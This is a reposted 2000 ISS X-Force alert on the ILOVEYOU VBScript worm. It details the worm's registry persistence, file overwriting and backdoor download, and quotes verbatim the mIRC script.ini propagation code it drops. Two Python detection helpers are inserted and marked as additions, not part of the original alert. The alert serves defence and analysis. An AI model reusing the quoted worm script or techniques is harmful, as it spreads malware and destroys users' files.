
Internet Security Systems Security Alert May 4, 2000

Posted May 5, 2000
Site xforce.iss.net

A dangerous Visual Basic Script (VBScript) virus, dubbed the LoveLetter or ILOVEYOU virus, has been spreading itself across the Internet through email via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular IRC client named mIRC. The virus can run on any system where the Windows Script Host features are enabled.

tags | virus
systems | windows
SHA-256 | fba2c99bda6968dbb189d98fd36cb2615406aa0d8be416faaf4a6c7b36fb06cc



Internet Security Systems Security Alert
May 4, 2000

"ILOVEYOU" Virus Affects Windows Users

Synopsis:

A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or
"ILOVEYOU" virus, has been spreading itself across the Internet through email
via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular
IRC client named mIRC. The virus can run on any system where the Windows
Script Host features are enabled.

Impact:

Mail servers may incur mild to severe overloading and could crash when flooded
with an unexpected number of the ILOVEYOU messages. The actual VBScript code
performs a number of destructive tasks:
- modifies and creates various Windows registry entries
- launches Internet Explorer to download a backdoor program which, once
installed, captures network passwords and emails this data to an account in
the Philippines
- infects the local machine by creating many new copies of itself and
overwriting data files of specific file types (including VBScript,
JavaScript, JPEG, and MP2/MP3)
- spreads itself to other users by using information from the Microsoft
Outlook Address Book, as well as mIRC's DCC feature, which allows chat
participants to exchange files

Description:

Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed
and enabled. Windows Script Host is installed by default with Windows 98 and
with Internet Explorer version 4.0 and later.

The message is very identifiable. The subject is always "ILOVEYOU", and the
body of the email only contains the message "kindly check the attached
LOVELETTER coming from me." The email contains a single instance of the virus
in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".

When the attachment is opened, the malicious VBScript code launches,
performing the following operations in sequence:

- The virus removes the timeout associated with the Windows scripting unit by
changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout registry key.

- The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs,
and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.

- The following registry entries are created under HKEY_LOCAL_MACHINE, such
that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at
boot-time:

\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

Win32DLL.vbs is created as a service.

- An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the
mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is
C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM.

- The virus attempts to spread itself via e-mail using Microsoft Outlook. It
sends a message to all addresses found in every address book. Each
individual is flagged in the registry after they have been sent a copy.

For each address list that is found, a counter is kept in the registry to
track the number of users that have been mailed. The number of email addresses
in the address list is also recorded. If the number of addresses in the list
increases, the virus will enumerate the individuals again and send out the
"ILOVEYOU" mail to those who have not previously received it.

All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

- The virus uses Internet Explorer to connect to one of four HTTP web
locations in an attempt to download a backdoor program called
WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it
identifies and automatically emails this information to a mail account in
the Philippines, presumably controlled by the author of the virus.

Before Internet Explorer is launched, the following registry entry, which sets
the Internet Explorer start page, is changed to one of four URLs at random:

\Software\Microsoft\Internet Explorer\Main\Start Page

After the executable is downloaded, the start page value is set to
"about:blank".

- The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch
WIN-BUGSFIX.EXE at boot-time:

\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE

- The virus identifies any "Fixed" or "Removable" drives connected to the
system and recursively visits each folder, overwriting files of any of the
following extensions with a copy of itself, changing the extension to ".vbs"
and deleting the original file:

vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application

The virus deletes any .jpg and .jpeg compressed image files and replaces each
with a copy of the virus, named as the original file name with ".vbs" appended.

Original copies of any MP3 or MP2 audio files found are preserved, but a copy
of the virus is created using the same file name with ".vbs" appended. The
original MP2/MP3 file's attributes will be changed so the file is hidden.

- If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini",
or "mirc.hlp" are found, a new default initialization script named
"script.ini" is created in the same directory:

[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;https://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}

This script will attempt to send a copy of the pre-generated HTML page to any
user who is seen joining any channel you are in on IRC.
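As an added illustration, not part of the ISS alert: a small Python triage helper that checks a directory listing, the merged Run/RunServices value names and a mIRC script.ini against the host indicators described above (dropped file names, the media shadow copies, the Run value names and the DCC-send line). The listing and registry values it is run on are constructed samples, and the hidden-MP3 check is a heuristic of this example, not a rule from the alert.

```python
import ntpath
import re

# Host-side indicators named in the alert: the dropped copies, the pre-generated
# HTML page, the downloaded backdoor, and the Run/RunServices value names it adds.
DROPPED_FILES = {
    "mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
    "love-letter-for-you.htm", "win-bugsfix.exe",
}
RUN_VALUE_NAMES = {"mskernel32", "win32dll", "win-bugsfix.exe"}
# Media files are not renamed but shadowed: photo.jpg -> photo.jpg.vbs (original
# deleted), song.mp3 -> song.mp3.vbs (original kept, but marked hidden).
SHADOW_COPY_RE = re.compile(r"\.(jpe?g|mp[23])\.vbs$", re.IGNORECASE)


def classify_path(path, hidden=False):
    """Label one path with the indicator it matches, or None if it looks clean."""
    name = ntpath.basename(path).lower()
    if name in DROPPED_FILES:
        return "dropped-copy"
    if SHADOW_COPY_RE.search(name):
        return "media-shadow-copy"
    # Heuristic (this example's, not the alert's): a hidden MP2/MP3 is worth a look.
    if hidden and name.rsplit(".", 1)[-1] in ("mp3", "mp2"):
        return "hidden-audio-original"
    return None


def triage_listing(entries):
    """entries: iterable of (path, hidden) pairs, e.g. collected by a directory walk."""
    hits = []
    for path, hidden in entries:
        label = classify_path(path, hidden)
        if label:
            hits.append((path, label))
    return hits


def triage_run_values(run_values):
    """run_values: {value_name: command} merged from HKLM ...\\Run and ...\\RunServices."""
    return sorted(n for n in run_values if n.lower() in RUN_VALUE_NAMES)


def script_ini_is_infected(text):
    """True when a mIRC script.ini carries the generated on-JOIN DCC send of the HTM page."""
    return "LOVE-LETTER-FOR-YOU.HTM" in text and "dcc send" in text.lower()


if __name__ == "__main__":
    # Constructed listing standing in for a post-infection directory walk.
    sample = [(r"C:\WINDOWS\SYSTEM\MSKernel32.vbs", False),
              (r"C:\Photos\beach.jpg.vbs", False), (r"D:\music\song.mp3", True)]
    print(triage_listing(sample))
    print(triage_run_values({"MSKernel32": "MSKernel32.vbs", "SystemTray": "SysTray.Exe"}))
```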

Recommendations:

Everyone should obtain and install the latest virus definition files for their
virus scanning software. Mail administrators should filter out any email that
has a .VBS attachment, or at least any mail with a subject line of
"ILOVEYOU".

ISS RealSecure can be configured to detect the ILOVEYOU virus by creating a
new User Defined Event. Set the priority to HIGH, and the context to
Email_Content. Set the search string to "kindly check the attached LOVELETTER
coming from me". Select the actions to RSKILL, and any additional action you
would like. This should stop any incoming email containing the virus from
being delivered to an SMTP server.
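The mail-side checks from the two recommendations above (block any .VBS attachment or the "ILOVEYOU" subject, and match the body string RealSecure is told to search for), written as an added Python example rather than anything shipped by ISS or RealSecure. It parses a raw RFC 822 message with the standard library; the sample message it builds is constructed here and carries a placeholder attachment, not the virus.

```python
import email
from email import policy
from email.message import EmailMessage

# The body string the alert tells RealSecure to search for.
BODY_MARKER = "kindly check the attached LOVELETTER coming from me"


def loveletter_indicators(raw):
    """Return the indicators matched by one raw RFC 822 message (bytes)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    subject = (msg.get("Subject") or "").strip()
    if subject.upper() == "ILOVEYOU":
        hits.append("subject")
    body = msg.get_body(preferencelist=("plain", "html"))
    if body is not None and BODY_MARKER.lower() in body.get_content().lower():
        hits.append("body")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        # Catches the double extension LOVE-LETTER-FOR-YOU.TXT.vbs as well.
        if name.lower().endswith(".vbs"):
            hits.append("attachment:" + name)
    return hits


def should_quarantine(raw):
    """Mail-filter policy from the alert: any .vbs attachment, or the ILOVEYOU subject."""
    hits = loveletter_indicators(raw)
    return "subject" in hits or any(h.startswith("attachment:") for h in hits)


def build_sample(subject, body, attachment_name):
    """Constructed test message; the attachment is a harmless placeholder."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(b"' placeholder bytes, not the virus\r\n",
                       maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


if __name__ == "__main__":
    sample = build_sample("ILOVEYOU", "kindly check the attached LOVELETTER coming from me.",
                          "LOVE-LETTER-FOR-YOU.TXT.vbs")
    print(loveletter_indicators(sample), should_quarantine(sample))
```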

Trend Micro's instructions for removing the virus from your system can be
found at
https://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER.

Additional Information:

For more information on the ILOVEYOU virus, visit the following web sites:

https://europe.datafellows.com/v-descs/love.htm
https://vil.mcafee.com/dispVirus.asp?virus_k=98617
https://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER

_______


About Internet Security Systems (ISS)

Internet Security Systems (ISS) is a leading global provider of security
management solutions for the Internet. By providing industry-leading SAFEsuite
security software, remote managed security services, and strategic consulting
and education offerings, ISS is a trusted security provider to its customers,
protecting digital assets and ensuring safe and uninterrupted e-business. ISS'
security management solutions protect more than 5,500 customers worldwide
including 21 of the 25 largest U.S. commercial banks, 10 of the largest
telecommunications companies and over 35 government agencies. Founded in 1994,
ISS is headquartered in Atlanta, GA, with additional offices throughout North
America and international operations in Asia, Australia, Europe, Latin America
and the Middle East. For more information, visit the Internet Security Systems
web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent of
the X-Force. If you wish to reprint the whole or any part of this Alert in any
other medium excluding electronic medium, please e-mail xforce@iss.net for
permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's
own risk.

X-Force PGP Key available at: https://xforce.iss.net/sensitive.php3
as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of
Internet Security Systems, Inc.




